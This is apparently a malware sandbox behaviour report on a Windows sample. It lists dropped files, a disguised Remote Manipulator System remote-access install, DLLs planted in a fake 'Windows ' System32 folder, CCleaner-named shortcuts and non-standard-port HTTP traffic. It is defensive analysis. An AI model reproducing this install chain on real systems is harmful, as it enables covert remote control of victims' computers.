Source: C:\Users\user\AppData\Local\Temp\servs.exe	File created: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\uxtheme.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\Users\user\AppData\Local\Temp\is-97L06.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File created: C:\Users\user\AppData\Local\Temp\sssevs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-R3F67.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-PFD3D.tmp	Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File created: C:\Users\user\AppData\Local\Temp\ssevs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	File created: C:\Users\user\AppData\Local\Temp\servs.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-1J28N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\CertMgry\is-OTUTI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-2SOD7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-4BBH3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-02I40.tmp	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-R3F67.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\ProgramData\is-PFD3D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-1J28N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\CertMgry\is-OTUTI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-2SOD7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-4BBH3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Immunity\is-02I40.tmp	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\uxtheme.dll			Jump to dropped file
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe			Jump to dropped file

Source: C:\ProgramData\Immunity\rutserv.exe

File created: C:\ProgramData\Remote Manipulator System\install.log

Boot Survival:

Stores files to the Windows start menu directory

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 38214
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 38214 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 32972
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 32972 -> 49763

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005A55A4 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,		19_2_005A55A4
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0062F930 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,		19_2_0062F930

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Stores large binary data to the registry

Source: C:\Windows\regedit.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\RMS Host Installer Security

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\pass.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
